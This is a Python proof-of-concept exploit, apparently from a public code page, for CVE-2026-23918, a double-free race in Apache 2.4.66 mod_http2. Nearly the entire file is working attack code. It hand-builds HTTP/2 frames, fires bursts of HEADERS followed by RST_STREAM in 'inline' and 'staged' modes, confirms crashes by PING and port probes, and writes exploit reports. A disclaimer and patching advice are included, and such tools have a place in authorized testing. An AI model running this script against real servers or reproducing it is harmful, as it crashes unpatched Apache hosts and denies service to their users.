README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-23918 PoC - Apache HTTP Server mod_http2 Double Free (Early Reset)
===========================================================================
VULNERABILITY: Double Free in Apache HTTP Server 2.4.66 when mod_http2
handles early RST_STREAM frames. The bug is in h2_mplx.c where
`m_stream_cleanup()` can add a stream to `m->spurge` array twice when
an RST_STREAM arrives before the worker thread starts processing.
AFFECTED: Apache HTTP Server 2.4.66 with mod_http2 + Event MPM
FIXED IN: 2.4.67 (mod_h2 v2.0.37: "Prevent double purge of a stream")
CVSS 3.1: 8.8 (HIGH) - Unauthenticated Remote Code Execution possible
CWE: CWE-415 (Double Free)
SVN FIXES: r1930444, r1930796
TRIGGER: Client sends HEADERS frame followed IMMEDIATELY by RST_STREAM
on the same stream ID. If the timing hits the window where the stream
is registered but processing hasn't started, `m_stream_cleanup()` adds
the stream to `m->spurge` (the purge array). Without the deduplication
check (`add_for_purge()` added in v2.0.37), the same stream can be
added again during mplx/connection cleanup → double pool destruction
→ double free → heap corruption.
DISCLAIMER: For authorized security testing and research only.
This tool requires explicit permission to test against any target.
"""
from __future__ import annotations
import argparse
import json
import os
import socket
import ssl
import struct
import sys
import textwrap
import time
from dataclasses import dataclass
from enum import Enum
from typing import Optional, List, Tuple
# Use hpack for proper HPACK encoding
try:
from hpack import Encoder as HpackEncoder
HAS_HPACK = True
except ImportError:
HAS_HPACK = False
# Use requests for HTTP/1.1 version probing
try:
import requests
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
# ─── Constants ───────────────────────────────────────────────────────
H2_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
# Frame types (RFC 7540 §4.1)
FRAME_DATA = 0x0
FRAME_HEADERS = 0x1
FRAME_PRIORITY = 0x2
FRAME_RST_STREAM = 0x3
FRAME_SETTINGS = 0x4
FRAME_PUSH_PROMISE = 0x5
FRAME_PING = 0x6
FRAME_GOAWAY = 0x7
FRAME_WINDOW_UPDATE = 0x8
FRAME_CONTINUATION = 0x9
# Frame flags
FLAG_ACK = 0x1
FLAG_END_STREAM = 0x1
FLAG_END_HEADERS = 0x4
# RST_STREAM error codes
ERR_NO_ERROR = 0x0
ERR_PROTOCOL_ERROR = 0x1
ERR_INTERNAL_ERROR = 0x2
ERR_CANCEL = 0x8
ERR_REFUSED_STREAM = 0x7
# ─── Frame Builder ───────────────────────────────────────────────────
@dataclass
class Frame:
"""HTTP/2 frame representation."""
type_: int
flags: int
stream_id: int
payload: bytes = b""
def serialize(self) -> bytes:
"""Serialize frame to wire format: 9-byte header + payload."""
length = len(self.payload)
header = (
struct.pack("!I", length)[1:] # 3 bytes: length (big-endian 24-bit)
+ bytes([self.type_]) # 1 byte: type
+ bytes([self.flags]) # 1 byte: flags
+ struct.pack("!I", self.stream_id & 0x7FFFFFFF) # 4 bytes: stream ID
)
return header + self.payload
def build_settings_frame(ack: bool = False) -> Frame:
return Frame(
type_=FRAME_SETTINGS,
flags=FLAG_ACK if ack else 0,
stream_id=0,
payload=b"",
)
def build_headers_frame(stream_id: int, headers: List[Tuple[str, str]],
end_stream: bool = False,
end_headers: bool = True,
encoder: Optional[HpackEncoder] = None) -> Frame:
"""Build HEADERS frame with proper HPACK encoding."""
if encoder is None:
encoder = HpackEncoder()
payload = encoder.encode(headers)
flags = 0
if end_stream:
flags |= FLAG_END_STREAM
if end_headers:
flags |= FLAG_END_HEADERS
return Frame(
type_=FRAME_HEADERS,
flags=flags,
stream_id=stream_id,
payload=payload,
)
def build_rst_stream_frame(stream_id: int, error_code: int = ERR_CANCEL) -> Frame:
return Frame(
type_=FRAME_RST_STREAM,
flags=0,
stream_id=stream_id,
payload=struct.pack("!I", error_code),
)
def build_window_update(stream_id: int, increment: int = 65535) -> Frame:
return Frame(
type_=FRAME_WINDOW_UPDATE,
flags=0,
stream_id=stream_id,
payload=struct.pack("!I", increment & 0x7FFFFFFF),
)
def build_ping_frame(data: bytes = b"\x00" * 8, ack: bool = False) -> Frame:
return Frame(
type_=FRAME_PING,
flags=FLAG_ACK if ack else 0,
stream_id=0,
payload=data,
)
def build_goaway_frame(last_stream_id: int = 0,
error_code: int = ERR_NO_ERROR) -> Frame:
return Frame(
type_=FRAME_GOAWAY,
flags=0,
stream_id=0,
payload=struct.pack("!II", last_stream_id & 0x7FFFFFFF, error_code),
)
# ─── Raw H2 Connection ───────────────────────────────────────────────
class H2Connection:
"""
Low-level HTTP/2 connection handler.
Uses raw frame construction for precise control over frame ordering
and timing - essential for race condition exploitation.
"""
def __init__(self, host: str, port: int, use_tls: bool = True,
timeout: float = 10.0):
self.host = host
self.port = port
self.use_tls = use_tls
self.timeout = timeout
self.sock: Optional[socket.socket] = None
self._encoder = HpackEncoder() if HAS_HPACK else None
self._headers = [
(":method", "GET"),
(":path", "/"),
(":scheme", "https"),
(":authority", host),
]
self._next_stream_id = 1
# ── Connection management ──────────────────────────────────────
def connect(self) -> bool:
"""Establish TCP + TLS connection with ALPN h2 negotiation."""
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(self.timeout)
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.sock.connect((self.host, self.port))
if self.use_tls:
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.set_alpn_protocols(["h2"])
ctx.minimum_version = ssl.TLSVersion.TLSv1_2
self.sock = ctx.wrap_socket(self.sock, server_hostname=self.host)
negotiated = self.sock.selected_alpn_protocol()
if negotiated != "h2":
raise RuntimeError(
f"ALPN negotiation failed: got '{negotiated}'")
return self._handshake()
except Exception as e:
return False
def _handshake(self) -> bool:
"""Send preface + SETTINGS, await server SETTINGS, ACK."""
try:
# Connection preface
self._send_raw(H2_PREFACE)
# Client SETTINGS (empty)
self._send_frame(build_settings_frame(ack=False))
# Read server SETTINGS
self.sock.settimeout(5.0)
frame = self._recv_frame()
self.sock.settimeout(self.timeout)
if frame is None:
return False
# Expect SETTINGS from server
if frame.type_ == FRAME_SETTINGS:
if not (frame.flags & FLAG_ACK):
# ACK server settings
self._send_frame(build_settings_frame(ack=True))
# Drain any WINDOW_UPDATE on stream 0
self._drain()
return True
elif frame.type_ == FRAME_GOAWAY:
return False
return True
except Exception:
return False
# ── Frame I/O ─────────────────────────────────────────────────
def _send_frame(self, frame: Frame) -> bool:
"""Send a single HTTP/2 frame."""
try:
self.sock.sendall(frame.serialize())
return True
except Exception:
return False
def _send_raw(self, data: bytes) -> bool:
"""Send raw bytes."""
try:
self.sock.sendall(data)
return True
except Exception:
return False
def _recv_exact(self, n: int) -> Optional[bytes]:
"""Receive exactly n bytes or None on failure."""
try:
buf = b""
while len(buf) < n:
chunk = self.sock.recv(n - len(buf))
if not chunk:
return None
buf += chunk
return buf
except Exception:
return None
def _recv_frame(self) -> Optional[Frame]:
"""Receive a single HTTP/2 frame."""
hdr = self._recv_exact(9)
if hdr is None:
return None
length = int.from_bytes(hdr[:3], "big")
frame_type = hdr[3]
flags = hdr[4]
stream_id = struct.unpack("!I", hdr[5:9])[0] & 0x7FFFFFFF
payload = b""
if length > 0:
payload = self._recv_exact(length)
if payload is None:
return None
return Frame(type_=frame_type, flags=flags,
stream_id=stream_id, payload=payload)
def _drain(self, timeout: float = 0.3):
"""Drain socket buffer."""
try:
self.sock.settimeout(timeout)
while True:
chunk = self.sock.recv(65536)
if not chunk:
break
except socket.timeout:
pass
except Exception:
pass
finally:
self.sock.settimeout(self.timeout)
# ── Exploit operations ────────────────────────────────────────
def send_exploit_stream(self, stream_id: int) -> bool:
"""
Send HEADERS frame immediately followed by RST_STREAM.
Combined into one send() call to maximize chance of them
arriving in the same TCP segment / processing window.
"""
hdr = build_headers_frame(
stream_id, self._headers,
end_stream=False, encoder=self._encoder,
)
rst = build_rst_stream_frame(stream_id, ERR_CANCEL)
return self._send_raw(hdr.serialize() + rst.serialize())
def send_exploit_burst(self, count: int,
start_stream_id: int = 1) -> int:
"""
Send a burst of HEADERS+RST_STREAM pairs.
Pre-serializes all frames for maximum throughput.
Returns number of pairs successfully sent.
"""
# Pre-build all frame pairs
payloads = []
for i in range(count):
sid = start_stream_id + (i * 2)
hdr = build_headers_frame(
sid, self._headers,
end_stream=False, encoder=self._encoder,
)
rst = build_rst_stream_frame(sid, ERR_CANCEL)
payloads.append(hdr.serialize() + rst.serialize())
# Fire all bursts as fast as possible
sent = 0
for payload in payloads:
if not self._send_raw(payload):
break
sent += 1
# Keep connection flow control window open
wu = build_window_update(0, 65535 * count)
self._send_frame(wu)
return sent
def send_raw_exploit_burst(self, count: int,
start_stream_id: int = 1) -> int:
"""
Alternative burst: send HEADERS to many streams first,
THEN send RST_STREAM to all of them. This changes the timing
profile and may be more effective at hitting the race window.
"""
streams = list(range(start_stream_id, start_stream_id + count * 2, 2))
sent = 0
# Phase 1: Open many streams
for sid in streams:
hdr = build_headers_frame(
sid, self._headers,
end_stream=False, encoder=self._encoder,
)
if not self._send_frame(hdr):
return sent
sent += 1
# Phase 2: Reset all streams immediately
for sid in streams:
rst = build_rst_stream_frame(sid, ERR_CANCEL)
self._send_frame(rst)
return sent
def ping(self) -> bool:
"""Send PING and check for PING ACK (health check)."""
pdata = os.urandom(8)
frame = build_ping_frame(pdata, ack=False)
if not self._send_frame(frame):
return False
try:
self.sock.settimeout(3.0)
resp = self._recv_frame()
self.sock.settimeout(self.timeout)
if resp and resp.type_ == FRAME_PING and (resp.flags & FLAG_ACK):
return resp.payload == pdata
except Exception:
self.sock.settimeout(self.timeout)
return False
def close(self):
"""Graceful connection close."""
if self.sock:
try:
self._send_frame(build_goaway_frame())
except Exception:
pass
try:
self.sock.close()
except Exception:
pass
# ─── Port Health Check ───────────────────────────────────────────────
def port_alive(host: str, port: int, timeout: float = 3.0) -> bool:
"""Test if TCP port accepts connections."""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect((host, port))
s.close()
return True
except Exception:
return False
# ─── Version Detection ───────────────────────────────────────────────
def detect_version(host: str, port: int, use_tls: bool = True,
timeout: float = 5.0) -> dict:
"""Detect Apache version via HTTP/1.1 request."""
info = {"version": "unknown", "server": "unknown", "http2_support": False}
if not HAS_REQUESTS:
return info
scheme = "https" if use_tls else "http"
try:
r = requests.get(
f"{scheme}://{host}:{port}/",
timeout=timeout,
verify=False,
headers={"User-Agent": "Mozilla/5.0"},
)
info["server"] = r.headers.get("Server", "unknown")
import re
m = re.search(r"Apache/([\d.]+)", info["server"])
if m:
info["version"] = m.group(1)
# Check for HTTP/2 via upgrade header in response
# (not 100% reliable for direct h2, but indicates awareness)
if "h2" in r.headers.get("Upgrade", ""):
info["http2_support"] = True
except Exception:
pass
# Try ALPN to detect h2 support
if use_tls:
try:
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.set_alpn_protocols(["h2", "http/1.1"])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect((host, port))
ss = ctx.wrap_socket(s, server_hostname=host)
negotiated = ss.selected_alpn_protocol()
ss.close()
if negotiated == "h2":
info["http2_support"] = True
except Exception:
pass
return info
# ─── Main Exploit Class ──────────────────────────────────────────────
class CVE202623918:
"""
CVE-2026-23918 Exploit for Apache HTTP Server mod_http2 Double Free.
ROOT CAUSE:
In Apache 2.4.66 (mod_h2 v2.0.33-v2.0.36), when an RST_STREAM arrives
before the stream's request is picked up by a worker thread (Event MPM),
h2_mplx.c:m_stream_cleanup() adds the stream to m->spurge (the purge
array). Since there was no deduplication check, the same stream could
be pushed again during connection/mplx teardown.
In v2.0.37, add_for_purge() was added to check if the stream is already
scheduled for purging, preventing the double free.
The v2.0.36 quick fix reverted streams' own memory allocators (from
v2.0.33), which masked the issue because APR pool cleanup functions
are idempotent when pools share allocators. But the root cause
(double push to spurge) remained until v2.0.37.
EXPLOIT MECHANICS:
1. Establish HTTP/2 connection (TLS + ALPN h2)
2. Send HEADERS frame to open a new stream
3. Immediately send RST_STREAM (CANCEL) on same stream
4. Repeat rapidly across many streams
5. Race condition: if RST_STREAM arrives during the narrow window
between stream registration and worker pickup, dual code paths
may both add the stream to the purge array
6. When the mplx is destroyed, the stream pool is freed twice
→ double free → glibc heap corruption → SIGABRT/SIGSEGV
"""
def __init__(self, target: str, port: int = 443,
use_tls: bool = True, timeout: float = 10.0,
verbose: bool = False):
self.target = target
self.port = port
self.use_tls = use_tls
self.timeout = timeout
self.verbose = verbose
self._crashed = False
def _log(self, msg: str, tag: str = "*"):
tags = {"*": "[*]", "+": "[+]", "-": "[-]", "!": "[!]"}
prefix = tags.get(tag, "[*]")
ts = time.strftime("%H:%M:%S")
print(f"{prefix} [{ts}] {msg}")
def check(self) -> dict:
"""Pre-exploit reconnaissance."""
info = detect_version(self.target, self.port, self.use_tls, self.timeout)
vulnerable = False
reason = "Unknown"
if info["version"] == "2.4.66":
if info["http2_support"]:
vulnerable = True
reason = "Apache 2.4.66 with HTTP/2 support - VULNERABLE"
else:
reason = "Apache 2.4.66 but HTTP/2 not detected - may need h2 ALPN"
elif info["version"] and info["version"] < "2.4.66":
reason = f"Apache {info['version']} < 2.4.66 - not affected"
elif info["version"] and info["version"] >= "2.4.67":
reason = f"Apache {info['version']} >= 2.4.67 - likely patched"
elif info["version"] == "unknown":
reason = "Version unknown - proceed with caution"
return {
"version": info["version"],
"server": info["server"],
"http2_support": info["http2_support"],
"vulnerable": vulnerable,
"reason": reason,
}
def _run_burst(self, burst_size: int, conn_id: int = 0,
mode: str = "inline") -> Tuple[int, bool]:
"""
Single connection exploit burst.
Returns (streams_sent, crashed).
"""
conn = H2Connection(
self.target, self.port,
use_tls=self.use_tls, timeout=self.timeout,
)
if not conn.connect():
self._log(f"Conn#{conn_id}: Connection failed", "-")
return 0, False
if mode == "inline":
# Both frames in one send() call
sent = conn.send_exploit_burst(burst_size)
elif mode == "staged":
# Open all, then reset all
sent = conn.send_raw_exploit_burst(burst_size)
else:
sent = 0
self._log(
f"Conn#{conn_id}: Sent {sent}/{burst_size} HEADERS+RST pairs",
"+" if sent > 0 else "-",
)
crashed = False
if sent > 0:
alive = conn.ping()
if not alive:
crashed = True
self._log(f"Conn#{conn_id}: PING failed - server likely crashed!", "+")
else:
self._log(f"Conn#{conn_id}: Server alive (PING OK)", tag="*" if self.verbose else "")
conn.close()
return sent, crashed
def execute(self, iterations: int = 10, burst_size: int = 200,
delay: float = 0.3, mode: str = "inline") -> dict:
"""
Execute the full exploit.
Args:
iterations: Number of exploit rounds
burst_size: HEADERS+RST_STREAM pairs per round
delay: Seconds between rounds
mode: 'inline' (HEADERS+RST in one send) or 'staged' (all headers then all RSTs)
"""
# Pre-check
check = self.check()
self._log(f"Target: {self.target}:{self.port}")
self._log(f"Version: {check['version']} | Server: {check['server']}")
self._log(f"HTTP/2: {'Yes' if check['http2_support'] else 'No/Unknown'}")
self._log(f"Assessment: {check['reason']}")
print()
total_sent = 0
crashes = 0
round_log = []
for i in range(iterations):
if self._crashed:
self._log("Crash already confirmed - stopping further iterations", "!")
break
# Pre-iteration health check
if i > 0 and not port_alive(self.target, self.port, 2.0):
self._log("Port is DOWN - crash CONFIRMED!", "+")
crashes += 1
self._crashed = True
break
self._log(f"Round {i+1}/{iterations} [{mode} mode, burst={burst_size}]")
sent, crashed = self._run_burst(burst_size, conn_id=i, mode=mode)
total_sent += sent
if crashed:
crashes += 1
self._crashed = True
round_log.append({
"round": i + 1,
"streams_sent": sent,
"crashed": crashed,
})
if not self._crashed and i < iterations - 1:
time.sleep(delay)
# Phase 2: Try the alternative mode if first didn't crash
if not self._crashed and mode == "inline":
self._log("Phase 2: Trying staged mode (burst first, then reset)...")
for i in range(iterations // 2):
if self._crashed:
break
if i > 0 and not port_alive(self.target, self.port, 2.0):
self._crashed = True
crashes += 1
break
self._log(f" Staged round {i+1}/{iterations//2}")
sent, crashed = self._run_burst(burst_size, conn_id=100 + i, mode="staged")
total_sent += sent
if crashed:
crashes += 1
self._crashed = True
if not self._crashed:
time.sleep(delay)
elif not self._crashed and mode == "staged":
self._log("Phase 2: Trying inline mode (HEADERS+RST in one send)...")
for i in range(iterations // 2):
if self._crashed:
break
if i > 0 and not port_alive(self.target, self.port, 2.0):
self._crashed = True
crashes += 1
break
self._log(f" Inline round {i+1}/{iterations//2}")
sent, crashed = self._run_burst(burst_size, conn_id=200 + i, mode="inline")
total_sent += sent
if crashed:
crashes += 1
self._crashed = True
if not self._crashed:
time.sleep(delay)
# Final health check
final_alive = port_alive(self.target, self.port, 3.0)
result = {
"target": f"{self.target}:{self.port}",
"version": check["version"],
"server": check["server"],
"http2_support": check["http2_support"],
"vulnerable": check["vulnerable"],
"iterations": iterations,
"burst_size": burst_size,
"mode": mode,
"total_streams_sent": total_sent,
"crashes": crashes,
"crash_confirmed": self._crashed,
"port_alive": final_alive,
"rounds": round_log,
}
# Summary
print()
self._log("=" * 60)
if self._crashed:
self._log("CRASH CONFIRMED - Target is VULNERABLE to CVE-2026-23918", "+")
else:
self._log("No crash detected", "-")
self._log("Possible reasons:", "!")
self._log(" - Target is not Apache 2.4.66", "!")
self._log(" - HTTP/2 not enabled (mod_http2)", "!")
self._log(" - Event MPM not in use", "!")
self._log(" - Target already patched (2.4.67+)", "!")
self._log(" - Need more iterations or larger burst", "!")
self._log(f"Total streams sent: {total_sent}")
self._log(f"Port status: {'ALIVE' if final_alive else 'DEAD/UNREACHABLE'}")
self._log("=" * 60)
return result
# ─── Report Generator ────────────────────────────────────────────────
def generate_report(result: dict, filepath: str):
"""Generate detailed Markdown exploit report."""
r = result
lines = [
f"# CVE-2026-23918 Exploit Report",
f"",
f"| Field | Value |",
f"|-------|-------|",
f"| **Target** | `{r['target']}` |",
f"| **Date** | {time.strftime('%Y-%m-%d %H:%M:%S')} |",
f"| **Apache Version** | {r['version']} |",
f"| **Server Header** | `{r['server']}` |",
f"| **HTTP/2 Support** | {'Yes' if r['http2_support'] else 'No/Unknown'} |",
f"| **Pre-assessed** | {'Vulnerable' if r['vulnerable'] else 'Unknown/Not'} |",
f"",
f"## Exploit Parameters",
f"",
f"| Parameter | Value |",
f"|-----------|-------|",
f"| Iterations | {r['iterations']} |",
f"| Burst size | {r['burst_size']} |",
f"| Attack mode | {r['mode']} |",
f"| Total streams sent | {r['total_streams_sent']} |",
f"| Crashes detected | {r['crashes']} |",
f"| Crash confirmed | **{'YES' if r['crash_confirmed'] else 'NO'}** |",
f"| Port alive (final) | {'Yes' if r['port_alive'] else 'No'} |",
f"",
f"## Technical Background",
f"",
f"CVE-2026-23918 is a **double-free vulnerability** (CWE-415) in ",
f"Apache HTTP Server's `mod_http2` module.",
f"",
f"### Affected Code Path",
f"",
f"The bug resides in `modules/http2/h2_mplx.c`:",
f"",
f"```c",
f"static void m_stream_cleanup(h2_mplx *m, h2_stream *stream)",
f"{{",
f" // ... various checks ...",
f"",
f" // Case: stream was submitted but not yet started",
f" // (early RST_STREAM before worker picked it up)",
f" else {{",
f" /* never started */",
f" APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream; // FIRST PUSH",
f" }}",
f"}}",
f"```",
f"",
f"Later, during `h2_mplx_destroy()` or connection cleanup, ",
f"another code path may also push the same stream to `m->spurge`:",
f"",
f"```c",
f"static void c1c2_stream_joined(h2_mplx *m, h2_stream *stream)",
f"{{",
f" // ... ",
f" APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream; // SECOND PUSH!",
f"}}",
f"```",
f"",
f"Without deduplication, both pushes reference the same stream pool.",
f"When `h2_mplx_destroy()` iterates `m->spurge`, it destroys the ",
f"pool **twice** → double free → heap corruption.",
f"",
f"### The Fix (mod_h2 v2.0.37 / Apache 2.4.67)",
f"",
f"```c",
f"static int add_for_purge(h2_mplx *m, h2_stream *stream)",
f"{{",
f" int i;",
f" for (i = 0; i < m->spurge->nelts; ++i) {{",
f" h2_stream *s = APR_ARRAY_IDX(m->spurge, i, h2_stream*);",
f" if (s == stream) /* already scheduled for purging */",
f" return FALSE;",
f" }}",
f" APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream;",
f" return TRUE;",
f"}}",
f"```",
]
if r["crash_confirmed"]:
lines.extend([
f"",
f"## Conclusion",
f"",
f"**The target IS VULNERABLE to CVE-2026-23918.**",
f"",
f"### Recommended Actions",
f"",
f"1. **Immediate:** Upgrade Apache HTTP Server to **2.4.67+**",
f"2. **Workaround:** Remove `h2` from the `Protocols` directive in httpd.conf",
f"3. **Alternative:** Apply the mod_h2 v2.0.37 backport (cPanel EA-13319)",
f"4. **Detection:** Monitor for repeated Apache child process crashes",
f" in error.log with mod_http2 stack traces",
])
else:
lines.extend([
f"",
f"## Conclusion",
f"",
f"Crash was NOT confirmed in this test run.",
f"",
f"### Possible Reasons:",
f"- Target is not Apache 2.4.66 or already patched to 2.4.67+",
f"- mod_http2 not loaded or HTTP/2 disabled via configuration",
f"- Event MPM not in use (race condition requires thread/process scheduling gap)",
f"- Network conditions prevented hitting the race window",
f"",
f"### Suggestions:",
f"- Increase iterations (`-n 50`) and burst size (`-b 1000`)",
f"- Try both `--mode inline` and `--mode staged`",
f"- Verify the target with `curl --http2 -k https://target/`",
])
with open(filepath, "w", encoding="utf-8") as f:
f.write("\n".join(lines))
# ─── CLI ─────────────────────────────────────────────────────────────
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-23918 PoC - Apache HTTP/2 Double Free",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent("""\
Examples:
%(prog)s -t 192.168.1.100 -p 443
%(prog)s -t example.com -p 443 -n 20 -b 500
%(prog)s -t example.com --mode staged -n 10
%(prog)s -t 10.0.0.1 --no-tls -p 80
%(prog)s -t target.com --check-only
%(prog)s -t target.com -o results.json --report exploit_report.md
"""),
)
parser.add_argument("-t", "--target", required=True,
help="Target hostname or IP address")
parser.add_argument("-p", "--port", type=int, default=443,
help="Target port (default: 443)")
parser.add_argument("--no-tls", action="store_true",
help="Use cleartext h2c instead of TLS h2")
parser.add_argument("-n", "--iterations", type=int, default=10,
help="Number of exploit iterations (default: 10)")
parser.add_argument("-b", "--burst", type=int, default=200,
help="HEADERS+RST pairs per iteration (default: 200)")
parser.add_argument("-d", "--delay", type=float, default=0.3,
help="Delay between iterations in seconds (default: 0.3)")
parser.add_argument("-m", "--mode", choices=["inline", "staged"],
default="inline",
help="Attack mode: inline (default) sends HEADERS+RST together; "
"staged opens all streams then resets all")
parser.add_argument("--timeout", type=float, default=10.0,
help="Connection timeout (default: 10)")
parser.add_argument("-v", "--verbose", action="store_true",
help="Verbose output")
parser.add_argument("--check-only", action="store_true",
help="Only check version, don't exploit")
parser.add_argument("-o", "--output",
help="Save results to JSON file")
parser.add_argument("--report",
help="Generate detailed markdown report to file")
args = parser.parse_args()
use_tls = not args.no_tls
if args.port == 80:
use_tls = False
if not HAS_REQUESTS:
print("[!] 'requests' library not available - version detection limited")
print("[!] Install: pip install requests")
if not HAS_HPACK:
print("[!] 'hpack' library not available - HPACK encoding may fail")
print("[!] Install: pip install hpack")
exploit = CVE202623918(
target=args.target,
port=args.port,
use_tls=use_tls,
timeout=args.timeout,
verbose=args.verbose,
)
if args.check_only:
info = exploit.check()
print(f"\n Target: {args.target}:{args.port}")
print(f" Version: {info['version']}")
print(f" Server: {info['server']}")
print(f" HTTP/2: {'Yes' if info['http2_support'] else 'No/Unknown'}")
print(f" Status: {'VULNERABLE' if info['vulnerable'] else 'NOT VULNERABLE / UNKNOWN'}")
print(f" Reason: {info['reason']}")
return 0 if not info["vulnerable"] else 1
result = exploit.execute(
iterations=args.iterations,
burst_size=args.burst,
delay=args.delay,
mode=args.mode,
)
if args.output:
with open(args.output, "w", encoding="utf-8") as f:
json.dump(result, f, indent=2, default=str)
print(f"\n[+] JSON results saved to {args.output}")
if args.report:
generate_report(result, args.report)
print(f"[+] Markdown report saved to {args.report}")
return 0 if not result["crash_confirmed"] else 1
if __name__ == "__main__":
sys.exit(main())